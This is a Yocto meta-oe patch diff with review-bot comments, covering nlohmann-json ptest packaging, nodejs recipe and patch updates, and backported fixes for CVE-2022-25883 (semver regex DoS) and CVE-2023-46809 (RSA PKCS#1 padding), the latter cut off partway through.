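Review bot: The justification above `CVE_CHECK_IGNORE += "CVE-2023-32732"` in the grpc recipe reads as if the CVE itself was "introduced" and "not backported", and it gives no reference a later reviewer could use to re-check the exclusion. I would state that the vulnerable code first appeared in v1.53.0 and is absent from the v1.46.x branch, and cite the upstream change or advisory, for example `# CVE-2023-32732: affected code added in v1.53.0, not present in v1.46.x (see <upstream commit or advisory URL>)`. An ignore entry without a checkable reference tends to survive version bumps after it has stopped being true.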
+++ b/meta-oe/recipes-devtools/nlohmann-json/files/run-ptest @@ -0,0 +1,12 @@ +#!/bin/sh + +cd tests +for atest in test-* ; do + rm -rf tests.log + ./${atest} > tests.log 2>&1 + if [ $? = 0 ] ; then + echo "PASS: ${atest}" + else + echo "FAIL: ${atest}" + fi +done diff --git a/meta-oe/recipes-devtools/nlohmann-json/nlohmann-json_3.10.5.bb b/meta-oe/recipes-devtools/nlohmann-json/nlohmann-json_3.10.5.bb index 0cf6fd36bc..8c45949142 100644 --- a/meta-oe/recipes-devtools/nlohmann-json/nlohmann-json_3.10.5.bb +++ b/meta-oe/recipes-devtools/nlohmann-json/nlohmann-json_3.10.5.bb @@ -6,23 +6,37 @@ LIC_FILES_CHKSUM = "file://LICENSE.MIT;md5=f969127d7b7ed0a8a63c2bbeae002588" CVE_PRODUCT = "json-for-modern-cpp" -SRC_URI = "git://github.com/nlohmann/json.git;nobranch=1;protocol=https \ - " +SRC_URI = "git://github.com/nlohmann/json.git;branch=develop;protocol=https \ + git://github.com/nlohmann/json_test_data.git;destsuffix=git/json_test_data;name=json-test-data;branch=master;protocol=https \ + file://run-ptest \ +" SRCREV = "4f8fba14066156b73f1189a2b8bd568bde5284c5" +SRCREV_json-test-data = "a1375cea09d27cc1c4cadb8d00470375b421ac37" + +SRCREV_FORMAT = "json-test-data" S = "${WORKDIR}/git" -inherit cmake +inherit cmake ptest -EXTRA_OECMAKE += "-DJSON_BuildTests=OFF" +EXTRA_OECMAKE += "${@bb.utils.contains('PTEST_ENABLED', '1', '-DJSON_BuildTests=ON -DJSON_TestDataDirectory=${PTEST_PATH}/json_test_data', '-DJSON_BuildTests=OFF', d)}" # nlohmann-json is a header only C++ library, so the main package will be empty. - +ALLOW_EMPTY:${PN} = "1" RDEPENDS:${PN}-dev = "" +RDEPENDS:${PN}-ptest = "perl" BBCLASSEXTEND = "native nativesdk" + +do_install_ptest () { + install -d ${D}${PTEST_PATH}/tests + cp -r ${S}/json_test_data/ ${D}${PTEST_PATH}/ + cp -r ${B}/test/test-* ${D}${PTEST_PATH}/tests +} + + # other packages commonly reference the file directly as "json.hpp" # create symlink to allow this usage do_install:append() { 
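Review bot: In the new run-ptest script, each iteration runs `rm -rf tests.log` and then redirects the test output into that same file. The output of a failing test is therefore overwritten by the next test, and the `FAIL:` line is all that reaches the ptest log. Printing the captured output in the failure branch, e.g. `echo "FAIL: ${atest}"; cat tests.log`, keeps the diagnostics. `cd tests` is also unchecked, so if the directory is missing the `test-*` glob is evaluated in whatever directory the script started in; `cd tests || exit 1` avoids that.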
diff --git a/meta-oe/recipes-devtools/nodejs/nodejs-oe-cache-16.14/oe-npm-cache b/meta-oe/recipes-devtools/nodejs/nodejs-oe-cache-16.20/oe-npm-cache
index f596207648..f596207648 100755
--- a/meta-oe/recipes-devtools/nodejs/nodejs-oe-cache-16.14/oe-npm-cache
+++ b/meta-oe/recipes-devtools/nodejs/nodejs-oe-cache-16.20/oe-npm-cache
diff --git a/meta-oe/recipes-devtools/nodejs/nodejs-oe-cache-native_16.14.bb b/meta-oe/recipes-devtools/nodejs/nodejs-oe-cache-native_16.20.bb
index a61dd5018f..a61dd5018f 100644
--- a/meta-oe/recipes-devtools/nodejs/nodejs-oe-cache-native_16.14.bb
+++ b/meta-oe/recipes-devtools/nodejs/nodejs-oe-cache-native_16.20.bb
diff --git a/meta-oe/recipes-devtools/nodejs/nodejs/0001-Nodejs-Fixed-pipes-DeprecationWarning.patch b/meta-oe/recipes-devtools/nodejs/nodejs/0001-Nodejs-Fixed-pipes-DeprecationWarning.patch
new file mode 100644
index 0000000000..1f54d444d7
--- /dev/null
+++ b/meta-oe/recipes-devtools/nodejs/nodejs/0001-Nodejs-Fixed-pipes-DeprecationWarning.patch
@@ -0,0 +1,35 @@ +From 70a008c59992b0ac6a868530bc3e249b7777ab95 Mon Sep 17 00:00:00 2001 +From: Archana Polampalli <archana.polampalli@windriver.com> +Date: Fri, 16 Dec 2022 05:19:06 +0000 +Subject: [PATCH] Nodejs: Fixed pipes DeprecationWarning + +DeprecationWarning: 'pipes' is deprecated and slated for removal in Python 3.13 + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + configure.py | 3 +-- + 1 file changed, 1 insertion(+), 2 deletions(-) + +diff --git a/configure.py b/configure.py +index d3192ca04c..8d279220fd 100755 +--- a/configure.py ++++ b/configure.py +@@ -5,7 +5,6 @@ import sys + import errno + import argparse + import os +-import pipes + import pprint + import re + import shlex +@@ -2041,7 +2040,7 @@ write('config.gypi', do_not_edit + + pprint.pformat(output, indent=2, width=1024) + '\n') + + write('config.status', '#!/bin/sh\nset -x\nexec ./configure ' + +- ' '.join([pipes.quote(arg) for arg in original_argv]) + '\n') ++ ' '.join([shlex.quote(arg) for arg in original_argv]) + '\n') + os.chmod('config.status', 0o775) + + +-- +2.34.1 diff --git a/meta-oe/recipes-devtools/nodejs/nodejs/0002-Using-native-binaries.patch b/meta-oe/recipes-devtools/nodejs/nodejs/0001-Using-native-binaries.patch index 8db1f1dd54..445aaf8398 100644 --- a/meta-oe/recipes-devtools/nodejs/nodejs/0002-Using-native-binaries.patch +++ b/meta-oe/recipes-devtools/nodejs/nodejs/0001-Using-native-binaries.patch @@ -3,14 +3,17 @@ From: Guillaume Burel <guillaume.burel@stormshield.eu> Date: Fri, 3 Jan 2020 11:25:54 +0100 Subject: [PATCH] Using native binaries +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> --- - node.gyp | 4 ++-- - tools/v8_gypfiles/v8.gyp | 11 ++++------- - 2 files changed, 6 insertions(+), 9 deletions(-) + node.gyp | 2 ++ + tools/v8_gypfiles/v8.gyp | 5 +++++ + 2 files changed, 7 insertions(+) +diff --git a/node.gyp b/node.gyp +index 24505da7ba..7d41bd52db 100644 --- a/node.gyp 
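Review bot: The header of the added 0001-Nodejs-Fixed-pipes-DeprecationWarning.patch has no `Upstream-Status:` line, although the CVE-2022-25883.patch added in the same diff carries one. Without it there is no record of whether the change exists upstream, and so no way to tell when this patch can be dropped on a Node.js upgrade. I would add `Upstream-Status: Backport [<upstream commit URL>]`, or `Pending` if it has not been submitted, above the `Signed-off-by:` line. The code change itself keeps every `original_argv` element shell-quoted when `config.status` is written, and `shlex` is already imported in the context lines, so only the provenance tag is missing.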
+++ b/node.gyp -@@ -294,6 +294,7 @@ +@@ -319,6 +319,7 @@ 'action_name': 'run_mkcodecache', 'process_outputs_as_sources': 1, 'inputs': [ @@ -18,14 +21,16 @@ Subject: [PATCH] Using native binaries '<(mkcodecache_exec)', ], 'outputs': [ -@@ -319,6 +320,7 @@ - 'action_name': 'node_mksnapshot', - 'process_outputs_as_sources': 1, - 'inputs': [ -+ '<(PRODUCT_DIR)/v8-qemu-wrapper.sh', - '<(node_mksnapshot_exec)', - ], - 'outputs': [ +@@ -366,6 +367,7 @@ + 'action_name': 'node_mksnapshot', + 'process_outputs_as_sources': 1, + 'inputs': [ ++ '<(PRODUCT_DIR)/v8-qemu-wrapper.sh', + '<(node_mksnapshot_exec)', + ], + 'outputs': [ +diff --git a/tools/v8_gypfiles/v8.gyp b/tools/v8_gypfiles/v8.gyp +index ed042f8829..371b8e02c2 100644 --- a/tools/v8_gypfiles/v8.gyp +++ b/tools/v8_gypfiles/v8.gyp @@ -68,6 +68,7 @@ @@ -40,11 +45,11 @@ Subject: [PATCH] Using native binaries '<@(torque_outputs_inc)', ], 'action': [ -+ '<(PRODUCT_DIR)/v8-qemu-wrapper.sh', ++ '<(PRODUCT_DIR)/v8-qemu-wrapper.sh', '<(PRODUCT_DIR)/<(EXECUTABLE_PREFIX)torque<(EXECUTABLE_SUFFIX)', '-o', '<(SHARED_INTERMEDIATE_DIR)/torque-generated', '-v8-root', '<(V8_ROOT)', -@@ -225,6 +227,7 @@ +@@ -211,6 +213,7 @@ { 'action_name': 'generate_bytecode_builtins_list_action', 'inputs': [ @@ -52,7 +57,7 @@ Subject: [PATCH] Using native binaries '<(PRODUCT_DIR)/<(EXECUTABLE_PREFIX)bytecode_builtins_list_generator<(EXECUTABLE_SUFFIX)', ], 'outputs': [ -@@ -415,6 +418,7 @@ +@@ -395,6 +398,7 @@ ], }, 'inputs': [ @@ -60,7 +65,7 @@ Subject: [PATCH] Using native binaries '<(mksnapshot_exec)', ], 'outputs': [ -@@ -1548,6 +1552,7 @@ +@@ -1513,6 +1517,7 @@ { 'action_name': 'run_gen-regexp-special-case_action', 'inputs': [ @@ -68,3 +73,6 @@ Subject: [PATCH] Using native binaries '<(PRODUCT_DIR)/<(EXECUTABLE_PREFIX)gen-regexp-special-case<(EXECUTABLE_SUFFIX)', ], 'outputs': [ +-- +2.34.1 + 
diff --git a/meta-oe/recipes-devtools/nodejs/nodejs/0002-Install-both-binaries-and-use-libdir.patch b/meta-oe/recipes-devtools/nodejs/nodejs/0002-Install-both-binaries-and-use-libdir.patch
deleted file mode 100644
index 5cb2e97015..0000000000
--- a/meta-oe/recipes-devtools/nodejs/nodejs/0002-Install-both-binaries-and-use-libdir.patch
+++ /dev/null
@@ -1,96 +0,0 @@ -From 62ddf8499747fb1e366477d666c0634ad50039a9 Mon Sep 17 00:00:00 2001 -From: Elliott Sales de Andrade <quantum.analyst@gmail.com> -Date: Tue, 19 Mar 2019 23:22:40 -0400 -Subject: [PATCH 2/2] Install both binaries and use libdir. - -This allows us to build with a shared library for other users while -still providing the normal executable. - -Taken from - https://src.fedoraproject.org/rpms/nodejs/raw/rawhide/f/0002-Install-both-binaries-and-use-libdir.patch - -Upstream-Status: Pending - -Signed-off-by: Elliott Sales de Andrade <quantum.analyst@gmail.com> -Signed-off-by: Andreas Müller <schnitzeltony@gmail.com> -Signed-off-by: Khem Raj <raj.khem@gmail.com> ---- - configure.py | 7 +++++++ - tools/install.py | 21 +++++++++------------ - 2 files changed, 16 insertions(+), 12 deletions(-) - -diff --git a/configure.py b/configure.py -index 6efb98c2316f089f3167e486282593245373af3f..a6d2ec939e4480dfae703f3978067537abf9f0f0 100755 ---- a/configure.py -+++ b/configure.py -@@ -721,10 +721,16 @@ parser.add_argument('--shared', - dest='shared', - default=None, - help='compile shared library for embedding node in another project. ' + - '(This mode is not officially supported for regular applications)') - -+parser.add_argument('--libdir', -+ action='store', -+ dest='libdir', -+ default='lib', -+ help='a directory to install the shared library into') -+ - parser.add_argument('--without-v8-platform', - action='store_true', - dest='without_v8_platform', - default=False, - help='do not initialize v8 platform during node.js startup. 
' + -@@ -1305,10 +1311,11 @@ def configure_node(o): - o['variables']['debug_nghttp2'] = 'false' - - o['variables']['node_no_browser_globals'] = b(options.no_browser_globals) - - o['variables']['node_shared'] = b(options.shared) -+ o['variables']['libdir'] = options.libdir - node_module_version = getmoduleversion.get_version() - - if options.dest_os == 'android': - shlib_suffix = 'so' - elif sys.platform == 'darwin': -diff --git a/tools/install.py b/tools/install.py -index 41cc1cbc60a9480cc08df3aa0ebe582c2becc3a2..11208f9e7166ab60da46d5ace2257c239a7e9263 100755 ---- a/tools/install.py -+++ b/tools/install.py -@@ -128,26 +128,23 @@ def subdir_files(path, dest, action): - for subdir, files_in_path in ret.items(): - action(files_in_path, subdir + '/') - - def files(action): - is_windows = sys.platform == 'win32' -- output_file = 'node' - output_prefix = 'out/Release/' -+ output_libprefix = output_prefix - -- if 'false' == variables.get('node_shared'): -- if is_windows: -- output_file += '.exe' -+ if is_windows: -+ output_bin = 'node.exe' -+ output_lib = 'node.dll' - else: -- if is_windows: -- output_file += '.dll' -- else: -- output_file = 'lib' + output_file + '.' + variables.get('shlib_suffix') -+ output_bin = 'node' -+ output_lib = 'libnode.' + variables.get('shlib_suffix') - -- if 'false' == variables.get('node_shared'): -- action([output_prefix + output_file], 'bin/' + output_file) -- else: -- action([output_prefix + output_file], 'lib/' + output_file) -+ action([output_prefix + output_bin], 'bin/' + output_bin) -+ if 'true' == variables.get('node_shared'): -+ action([output_libprefix + output_lib], variables.get('libdir') + '/' + output_lib) - - if 'true' == variables.get('node_use_dtrace'): - action(['out/Release/node.d'], 'lib/dtrace/node.d') - - # behave similarly for systemtap --- -2.33.0 - 
diff --git a/meta-oe/recipes-devtools/nodejs/nodejs/0005-add-openssl-legacy-provider-option.patch b/meta-oe/recipes-devtools/nodejs/nodejs/0005-add-openssl-legacy-provider-option.patch deleted file mode 100644 index 4d238c03f4..0000000000 --- a/meta-oe/recipes-devtools/nodejs/nodejs/0005-add-openssl-legacy-provider-option.patch +++ /dev/null @@ -1,151 +0,0 @@ -From 86d1c0cc6a5dcf57e413a1cc1c29203e87cf9a14 Mon Sep 17 00:00:00 2001 -From: Daniel Bevenius <daniel.bevenius@gmail.com> -Date: Sat, 16 Oct 2021 08:50:16 +0200 -Subject: [PATCH] src: add --openssl-legacy-provider option - -This commit adds an option to Node.js named --openssl-legacy-provider -and if specified will load OpenSSL 3.0 Legacy provider. - -$ ./node --help -... ---openssl-legacy-provider enable OpenSSL 3.0 legacy provider - -Example usage: - -$ ./node --openssl-legacy-provider -p 'crypto.createHash("md4")' -Hash { - _options: undefined, - [Symbol(kHandle)]: Hash {}, - [Symbol(kState)]: { [Symbol(kFinalized)]: false } -} - -Co-authored-by: Richard Lau <rlau@redhat.com> -Signed-off-by: 
Signed-off-by: Andrej Valek <andrej.valek@siemens.com> -Upstream-Status: Backport [https://github.com/nodejs/node/issues/40455] ---- - doc/api/cli.md | 10 ++++++++++ - src/crypto/crypto_util.cc | 10 ++++++++++ - src/node_options.cc | 10 ++++++++++ - src/node_options.h | 7 +++++++ - .../test-process-env-allowed-flags-are-documented.js | 5 +++++ - 5 files changed, 42 insertions(+) - -diff --git a/doc/api/cli.md b/doc/api/cli.md -index 74057706bf8d..608b9cdeddf1 100644 ---- a/doc/api/cli.md -+++ b/doc/api/cli.md -@@ -687,6 +687,14 @@ Load an OpenSSL configuration file on startup. Among other uses, this can be - used to enable FIPS-compliant crypto if Node.js is built - against FIPS-enabled OpenSSL. - -+### `--openssl-legacy-provider` -+<!-- YAML -+added: REPLACEME -+--> -+ -+Enable OpenSSL 3.0 legacy provider. For more information please see -+[providers readme][]. -+ - ### `--pending-deprecation` - - <!-- YAML -@@ -1544,6 +1552,7 @@ Node.js options that are allowed are: - * `--no-warnings` - * `--node-memory-debug` - * `--openssl-config` -+* `--openssl-legacy-provider` - * `--pending-deprecation` - * `--policy-integrity` - * `--preserve-symlinks-main` -@@ -1933,6 +1942,7 @@ $ node --max-old-space-size=1536 index.js - [emit_warning]: process.md#processemitwarningwarning-options - [jitless]: https://v8.dev/blog/jitless - [libuv threadpool documentation]: https://docs.libuv.org/en/latest/threadpool.html -+[providers readme]: https://github.com/openssl/openssl/blob/openssl-3.0.0/README-PROVIDERS.md - [remote code execution]: https://www.owasp.org/index.php/Code_Injection - [security warning]: #warning-binding-inspector-to-a-public-ipport-combination-is-insecure - [timezone IDs]: https://en.wikipedia.org/wiki/List_of_tz_database_time_zones -diff --git a/src/crypto/crypto_util.cc b/src/crypto/crypto_util.cc -index 7e0c8ba3eb60..796ea3025e41 100644 ---- a/src/crypto/crypto_util.cc -+++ b/src/crypto/crypto_util.cc -@@ -148,6 +148,16 @@ void InitCryptoOnce() { - } - #endif - 
-+#if OPENSSL_VERSION_MAJOR >= 3 -+ // --openssl-legacy-provider -+ if (per_process::cli_options->openssl_legacy_provider) { -+ OSSL_PROVIDER* legacy_provider = OSSL_PROVIDER_load(nullptr, "legacy"); -+ if (legacy_provider == nullptr) { -+ fprintf(stderr, "Unable to load legacy provider.\n"); -+ } -+ } -+#endif -+ - OPENSSL_init_ssl(0, settings); - OPENSSL_INIT_free(settings); - settings = nullptr; -diff --git a/src/node_options.cc b/src/node_options.cc -index 00bdc6688a4c..3363860919a9 100644 ---- a/src/node_options.cc -+++ b/src/node_options.cc -@@ -4,6 +4,9 @@ - #include "env-inl.h" - #include "node_binding.h" - #include "node_internals.h" -+#if HAVE_OPENSSL -+#include "openssl/opensslv.h" -+#endif - - #include <errno.h> - #include <sstream> -diff --git a/src/node_options.h b/src/node_options.h -index fd772478d04d..1c0e018ab16f 100644 ---- a/src/node_options.h -+++ b/src/node_options.h -@@ -11,6 +11,10 @@ - #include "node_mutex.h" - #include "util.h" - -+#if HAVE_OPENSSL -+#include "openssl/opensslv.h" -+#endif -+ - namespace node { - - class HostPort { -@@ -251,6 +255,9 @@ class PerProcessOptions : public Options { - bool enable_fips_crypto = false; - bool force_fips_crypto = false; - #endif -+#if OPENSSL_VERSION_MAJOR >= 3 -+ bool openssl_legacy_provider = false; -+#endif - - // Per-process because reports can be triggered outside a known V8 context. - bool report_on_fatalerror = false; -diff --git a/test/parallel/test-process-env-allowed-flags-are-documented.js b/test/parallel/test-process-env-allowed-flags-are-documented.js -index 64626b71f019..8a4e35997907 100644 ---- a/test/parallel/test-process-env-allowed-flags-are-documented.js -+++ b/test/parallel/test-process-env-allowed-flags-are-documented.js -@@ -43,6 +43,10 @@ for (const line of [...nodeOptionsLines, ...v8OptionsLines]) { - } - } - -+if (!common.hasOpenSSL3) { -+ documented.delete('--openssl-legacy-provider'); -+} -+ - // Filter out options that are conditionally present. 
- const conditionalOpts = [ - { -@@ -50,6 +54,7 @@ const conditionalOpts = [ - filter: (opt) => { - return [ - '--openssl-config', -+ common.hasOpenSSL3 ? '--openssl-legacy-provider' : '', - '--tls-cipher-list', - '--use-bundled-ca', - '--use-openssl-ca', - diff --git a/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2022-25883.patch b/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2022-25883.patch new file mode 100644 index 0000000000..4c73b556f9 --- /dev/null +++ b/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2022-25883.patch 
@@ -0,0 +1,262 @@ +From 717534ee353682f3bcf33e60a8af4292626d4441 Mon Sep 17 00:00:00 2001 +From: Luke Karrys <luke@lukekarrys.com> +Date: Thu, 15 Jun 2023 12:21:14 -0700 +Subject: [PATCH] fix: better handling of whitespace (#564) + +CVE: CVE-2022-25883 + +Upstream-Status: Backport [https://github.com/npm/node-semver/commit/717534ee353682f3bcf33e60a8af4292626d4441] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + .../node_modules/semver/classes/comparator.js | 3 +- + deps/npm/node_modules/semver/classes/range.js | 64 +++++++++++-------- + .../npm/node_modules/semver/classes/semver.js | 2 +- + .../node_modules/semver/functions/coerce.js | 2 +- + deps/npm/node_modules/semver/internal/re.js | 11 ++++ + deps/npm/node_modules/semver/package.json | 2 +- + 6 files changed, 53 insertions(+), 31 deletions(-) + +diff --git a/deps/npm/node_modules/semver/classes/comparator.js b/deps/npm/node_modules/semver/classes/comparator.js +index 62cd204..c909446 100644 +--- a/deps/npm/node_modules/semver/classes/comparator.js ++++ b/deps/npm/node_modules/semver/classes/comparator.js +@@ -16,6 +16,7 @@ class Comparator { + } + } + ++ comp = comp.trim().split(/\s+/).join(' ') + debug('comparator', comp, options) + this.options = options + this.loose = !!options.loose +@@ -129,7 +130,7 @@ class Comparator { + module.exports = Comparator + + const parseOptions = require('../internal/parse-options') +-const { re, t } = require('../internal/re') ++const { safeRe: re, t } = require('../internal/re') + const cmp = require('../functions/cmp') + const debug = require('../internal/debug') + const SemVer = require('./semver') +diff --git a/deps/npm/node_modules/semver/classes/range.js b/deps/npm/node_modules/semver/classes/range.js +index 7dc24bc..8e2e1f9 100644 +--- a/deps/npm/node_modules/semver/classes/range.js ++++ b/deps/npm/node_modules/semver/classes/range.js +@@ -26,19 +26,26 @@ class Range { + this.loose = !!options.loose + this.includePrerelease = 
!!options.includePrerelease + +- // First, split based on boolean or || ++ // First reduce all whitespace as much as possible so we do not have to rely ++ // on potentially slow regexes like \s*. This is then stored and used for ++ // future error messages as well. + this.raw = range +- this.set = range ++ .trim() ++ .split(/\s+/) ++ .join(' ') ++ ++ // First, split on || ++ this.set = this.raw + .split('||') + // map the range to a 2d array of comparators +- .map(r => this.parseRange(r.trim())) ++ .map(r => this.parseRange(r)) + // throw out any comparator lists that are empty + // this generally means that it was not a valid range, which is allowed + // in loose mode, but will still throw if the WHOLE range is invalid. + .filter(c => c.length) + + if (!this.set.length) { +- throw new TypeError(`Invalid SemVer Range: ${range}`) ++ throw new TypeError(`Invalid SemVer Range: ${this.raw}`) + } + + // if we have any that are not the null set, throw out null sets. +@@ -64,9 +71,7 @@ class Range { + + format () { + this.range = this.set +- .map((comps) => { +- return comps.join(' ').trim() +- }) ++ .map((comps) => comps.join(' ').trim()) + .join('||') + .trim() + return this.range +@@ -77,8 +82,6 @@ class Range { + } + + parseRange (range) { +- range = range.trim() +- + // memoize range parsing for performance. + // this is a very hot path, and fully deterministic. + const memoOpts = Object.keys(this.options).join(',') +@@ -103,9 +106,6 @@ class Range { + // `^ 1.2.3` => `^1.2.3` + range = range.replace(re[t.CARETTRIM], caretTrimReplace) + +- // normalize spaces +- range = range.split(/\s+/).join(' ') +- + // At this point, the range is completely trimmed and + // ready to be split into comparators. 
+ +@@ -200,7 +200,7 @@ const Comparator = require('./comparator') + const debug = require('../internal/debug') + const SemVer = require('./semver') + const { +- re, ++ safeRe: re, + t, + comparatorTrimReplace, + tildeTrimReplace, +@@ -252,10 +252,13 @@ const isX = id => !id || id.toLowerCase() === 'x' || id === '*' + // ~1.2, ~1.2.x, ~>1.2, ~>1.2.x --> >=1.2.0 <1.3.0-0 + // ~1.2.3, ~>1.2.3 --> >=1.2.3 <1.3.0-0 + // ~1.2.0, ~>1.2.0 --> >=1.2.0 <1.3.0-0 +-const replaceTildes = (comp, options) => +- comp.trim().split(/\s+/).map((c) => { +- return replaceTilde(c, options) +- }).join(' ') ++const replaceTildes = (comp, options) => { ++ return comp ++ .trim() ++ .split(/\s+/) ++ .map((c) => replaceTilde(c, options)) ++ .join(' ') ++} + + const replaceTilde = (comp, options) => { + const r = options.loose ? re[t.TILDELOOSE] : re[t.TILDE] +@@ -291,10 +294,13 @@ const replaceTilde = (comp, options) => { + // ^1.2, ^1.2.x --> >=1.2.0 <2.0.0-0 + // ^1.2.3 --> >=1.2.3 <2.0.0-0 + // ^1.2.0 --> >=1.2.0 <2.0.0-0 +-const replaceCarets = (comp, options) => +- comp.trim().split(/\s+/).map((c) => { +- return replaceCaret(c, options) +- }).join(' ') ++const replaceCarets = (comp, options) => { ++ return comp ++ .trim() ++ .split(/\s+/) ++ .map((c) => replaceCaret(c, options)) ++ .join(' ') ++} + + const replaceCaret = (comp, options) => { + debug('caret', comp, options) +@@ -351,9 +357,10 @@ const replaceCaret = (comp, options) => { + + const replaceXRanges = (comp, options) => { + debug('replaceXRanges', comp, options) +- return comp.split(/\s+/).map((c) => { +- return replaceXRange(c, options) +- }).join(' ') ++ return comp ++ .split(/\s+/) ++ .map((c) => replaceXRange(c, options)) ++ .join(' ') + } + + const replaceXRange = (comp, options) => { +@@ -436,12 +443,15 @@ const replaceXRange = (comp, options) => { + const replaceStars = (comp, options) => { + debug('replaceStars', comp, options) + // Looseness is ignored here. star is always as loose as it gets! 
+- return comp.trim().replace(re[t.STAR], '') ++ return comp ++ .trim() ++ .replace(re[t.STAR], '') + } + + const replaceGTE0 = (comp, options) => { + debug('replaceGTE0', comp, options) +- return comp.trim() ++ return comp ++ .trim() + .replace(re[options.includePrerelease ? t.GTE0PRE : t.GTE0], '') + } + +@@ -479,7 +489,7 @@ const hyphenReplace = incPr => ($0, + to = `<=${to}` + } + +- return (`${from} ${to}`).trim() ++ return `${from} ${to}`.trim() + } + + const testSet = (set, version, options) => { +diff --git a/deps/npm/node_modules/semver/classes/semver.js b/deps/npm/node_modules/semver/classes/semver.js +index af62955..ad4e877 100644 +--- a/deps/npm/node_modules/semver/classes/semver.js ++++ b/deps/npm/node_modules/semver/classes/semver.js +@@ -1,6 +1,6 @@ + const debug = require('../internal/debug') + const { MAX_LENGTH, MAX_SAFE_INTEGER } = require('../internal/constants') +-const { re, t } = require('../internal/re') ++const { safeRe: re, t } = require('../internal/re') + + const parseOptions = require('../internal/parse-options') + const { compareIdentifiers } = require('../internal/identifiers') +diff --git a/deps/npm/node_modules/semver/functions/coerce.js b/deps/npm/node_modules/semver/functions/coerce.js +index 2e01452..febbff9 100644 +--- a/deps/npm/node_modules/semver/functions/coerce.js ++++ b/deps/npm/node_modules/semver/functions/coerce.js +@@ -1,6 +1,6 @@ + const SemVer = require('../classes/semver') + const parse = require('./parse') +-const { re, t } = require('../internal/re') ++const { safeRe: re, t } = require('../internal/re') + + const coerce = (version, options) => { + if (version instanceof SemVer) { +diff --git a/deps/npm/node_modules/semver/internal/re.js b/deps/npm/node_modules/semver/internal/re.js +index ed88398..f73ef1a 100644 +--- a/deps/npm/node_modules/semver/internal/re.js ++++ b/deps/npm/node_modules/semver/internal/re.js +@@ -4,16 +4,27 @@ exports = module.exports = {} + + // The actual regexps go on exports.re + const re 
= exports.re = [] ++const safeRe = exports.safeRe = [] + const src = exports.src = [] + const t = exports.t = {} + let R = 0 + + const createToken = (name, value, isGlobal) => { ++ // Replace all greedy whitespace to prevent regex dos issues. These regex are ++ // used internally via the safeRe object since all inputs in this library get ++ // normalized first to trim and collapse all extra whitespace. The original ++ // regexes are exported for userland consumption and lower level usage. A ++ // future breaking change could export the safer regex only with a note that ++ // all input should have extra whitespace removed. ++ const safe = value ++ .split('\\s*').join('\\s{0,1}') ++ .split('\\s+').join('\\s') + const index = R++ + debug(name, index, value) + t[name] = index + src[index] = value + re[index] = new RegExp(value, isGlobal ? 'g' : undefined) ++ safeRe[index] = new RegExp(safe, isGlobal ? 'g' : undefined) + } + + // The following Regular Expressions can be used for tokenizing, +diff --git a/deps/npm/node_modules/semver/package.json b/deps/npm/node_modules/semver/package.json +index 7898f59..d8ae619 100644 +--- a/deps/npm/node_modules/semver/package.json ++++ b/deps/npm/node_modules/semver/package.json +@@ -40,7 +40,7 @@ + "range.bnf" + ], + "tap": { +- "check-coverage": true, ++ "timeout": 30, + "coverage-map": "map.js" + }, + "engines": { +-- +2.40.0 diff --git a/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2023-46809.patch b/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2023-46809.patch new file mode 100644 index 0000000000..991d39fcf9 --- /dev/null +++ b/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2023-46809.patch 
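Review bot: `createToken` in internal/re.js still builds and exports the original `re` array beside the new `safeRe`, so the bounded-whitespace patterns protect only the four files this patch switches to `safeRe: re` (comparator.js, range.js, semver.js, coerce.js). Any other consumer in the vendored tree that requires `re` directly keeps the slow `\s*` / `\s+` forms; whether such a consumer exists cannot be checked from this patch. The semver.js and coerce.js hunks show only the `require` change, so confirm outside the hunk that those entry points still accept the inputs they did before, since `safeRe` no longer matches runs of whitespace. The package.json hunk touches only the `tap` block, so the vendored version string is presumably unchanged and version-based scanners may keep reporting CVE-2022-25883 for this copy. A header line such as `Note: semver version string left unchanged, fix backported onto the vendored copy` would record that for whoever triages the scanner output.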
@@ -0,0 +1,625 @@ +From d3d357ab096884f10f5d2f164149727eea875635 Mon Sep 17 00:00:00 2001 +From: Michael Dawson <midawson@redhat.com> +Date: Thu, 4 Jan 2024 21:32:51 +0000 +Subject: [PATCH] crypto: disable PKCS#1 padding for privateDecrypt + +Refs: https://hackerone.com/bugs?subject=nodejs&report_id=2269177 + +Disable RSA_PKCS1_PADDING for crypto.privateDecrypt() in order +to protect against the Marvin attack. + +Includes a security revert flag that can be used to restore +support. + +Signed-off-by: Michael Dawson <midawson@redhat.com> +PR-URL: https://github.com/nodejs-private/node-private/pull/525 +Reviewed-By: Rafael Gonzaga <rafael.nunu@hotmail.com> +Reviewed-By: Matteo Collina <matteo.collina@gmail.com> + +CVE-ID: CVE-2023-46809 + +Upstream-Status: Backport [https://github.com/nodejs/node/commit/d3d357ab096884f1] +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + src/crypto/crypto_cipher.cc | 28 ++ + src/node_revert.h | 1 + + test/parallel/test-crypto-rsa-dsa-revert.js | 475 ++++++++++++++++++++ + test/parallel/test-crypto-rsa-dsa.js | 42 +- + 4 files changed, 533 insertions(+), 13 deletions(-) + create mode 100644 test/parallel/test-crypto-rsa-dsa-revert.js + +diff --git a/src/crypto/crypto_cipher.cc b/src/crypto/crypto_cipher.cc +index 10579ce..0311c68 100644 +--- a/src/crypto/crypto_cipher.cc ++++ b/src/crypto/crypto_cipher.cc +@@ -6,6 +6,7 @@ + #include "node_buffer.h" + #include "node_internals.h" + #include "node_process-inl.h" ++#include "node_revert.h" + #include "v8.h" + + namespace node { +@@ -1061,6 +1062,33 @@ void PublicKeyCipher::Cipher(const FunctionCallbackInfo<Value>& args) { + uint32_t padding; + if (!args[offset + 1]->Uint32Value(env->context()).To(&padding)) return; + ++ if (EVP_PKEY_cipher == EVP_PKEY_decrypt && ++ operation == PublicKeyCipher::kPrivate && padding == RSA_PKCS1_PADDING && ++ !IsReverted(SECURITY_REVERT_CVE_2023_46809)) { ++ EVPKeyCtxPointer ctx(EVP_PKEY_CTX_new(pkey.get(), nullptr)); ++ CHECK(ctx); 
